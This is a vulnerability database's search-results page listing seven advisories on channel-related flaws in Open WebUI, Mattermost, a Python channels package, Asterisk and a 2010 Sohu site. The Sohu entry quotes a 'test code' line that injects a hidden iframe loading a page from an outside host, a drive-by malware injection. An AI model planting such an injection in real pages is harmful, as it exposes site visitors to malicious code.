Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in
🔥 Daily Hot!
💪🏽 CPE Enhanced Advisories
🕶 Shadow Exploits
🕵🏼 Vulners CPE
🔐 Security news
💻 Exploit updates
📑 Blogs review
🐧 Linux vulnerabilities
🐞 Bugbounty
🤖 AI High Score
📰 CVE Feed
show all

7 matches found

RedhatCVE
RedhatCVEadded 2026/05/18 7:58 p.m.10 views

CVE-2026-45385

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, an IDOR vulnerability exists in the Channels feature of Open WebUI, allowing any channel member to modify messages sent by other members including administrators within the same...

4.3CVSS5.8AI score0.00204EPSS
Exploits1References1
Veracode
Veracodeadded 2024/08/12 10:24 a.m.11 views

Improper Access Control

github.com/mattermost/mattermost-server is vulnerable to Improper Access Control. The vulnerability is caused due to a failure to disallow the modification of local channels by a remote, when shared channels are enabled. This allows a malicious remote user to make an arbitrary local channel...

4.3CVSS6.7AI score0.00276EPSS
Exploits0References3Affected Software1
OSV
OSVadded 2024/08/01 3:15 p.m.9 views

CVE-2024-39832

Mattermost versions 9.9.x = 9.9.0, 9.5.x = 9.5.6, 9.7.x = 9.7.5, 9.8.x = 9.8.1 fail to properly safeguard an error handling which allows a malicious remote to permanently delete local data by abusing dangerous error handling, when share channels were enabled...

8.7CVSS6.6AI score
Exploits0References1
Cvelist
Cvelistadded 2024/08/01 2:5 p.m.26 views

CVE-2024-39832 Permanently local data deletion by malicious remote

Mattermost versions 9.9.x = 9.9.0, 9.5.x = 9.5.6, 9.7.x = 9.7.5, 9.8.x = 9.8.1 fail to properly safeguard an error handling which allows a malicious remote to permanently delete local data by abusing dangerous error handling, when share channels were enabled...

6.8CVSS0.0046EPSS
Exploits0References1
vulnersOsv
vulnersOsvadded 2021/03/19 9:29 p.m.4 views

feature-toggle-manager (>=0.0.1 <=0.0.2), hazard-feed (>=0.2.0 <=0.2.5) potentially affected by CVE-2020-35681 via channels (>=3.0.0 <=3.0.2)

channels PYPI version =3.0.0, =0.0.1, =0.2.0, =0.2.5 Source cves: CVE-2020-35681 Source advisory: OSV:GHSA-V542-8Q9X-CFFC...

7.4CVSS7.1AI score0.02658EPSS
Exploits1
CNVD
CNVDadded 2019/11/22 12:0 a.m.3 views

Sangoma Technologies Asterisk and Sangoma Technologies Certified Asterisk Denial of Service Vulnerabilities

Sangoma Technologies Asterisk and Sangoma Technologies Certified Asterisk are both products of Sangoma Technologies, a Canadian company.Sangoma Technologies Asterisk is a suite of open source telephone switch PBX system software. Sangoma Technologies Asterisk is an open source telephone exchange...

6.5CVSS6.7AI score0.02047EPSS
Exploits0References1
myhack58
myhack58added 2010/01/30 12:0 a.m.13 views

Sohu 2 0 1 0 show channels exist hung it to the vulnerability 0day-vulnerability warning-the black bar safety net

Together to chat about the show section,not the user input is strict filtering,which leads can be inserted into the malicious code so as to achieve hung it to the object. ! Test code: Copy the code document. write"iframe width='1 0 0 0' height=1 0 0 0' src='http://www.hackqing.cn/mm.htm/iframe";...

0.5AI score
Exploits0
Rows per page
Query Builder